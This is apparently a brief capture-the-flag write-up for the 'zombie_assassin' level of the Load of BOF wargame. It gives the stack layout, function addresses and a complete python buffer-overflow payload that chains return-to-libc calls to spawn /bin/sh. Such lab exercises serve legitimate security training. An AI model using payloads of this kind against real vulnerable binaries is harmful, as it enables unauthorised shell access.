Wargames/Load Of BOF
LOB Redhat 6.2 - zombie_assassin
5unKn0wn
2015. 10. 30. 19:59
zomble_assassin - calling functions continuously
Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]
DO : 0x80487ec
GYE : 0x80487bc
GUL : 0x804878c
YUT : 0x804875c
MO : 0x8048724
"/bin/sh" : 0xbffffa98
Payload : ./succubus `python -c 'print "A"*44 + "\xec\x87\x04\x08" + "\xbc\x87\x04\x08" + "\x8c\x87\x04\x08" + "\x5c\x87\x04\x08" + "\x24\x87\x04\x08" + "AAAA" + "\x98\xfa\xff\xbf" + "/bin/sh"'`
Using RTL Chaining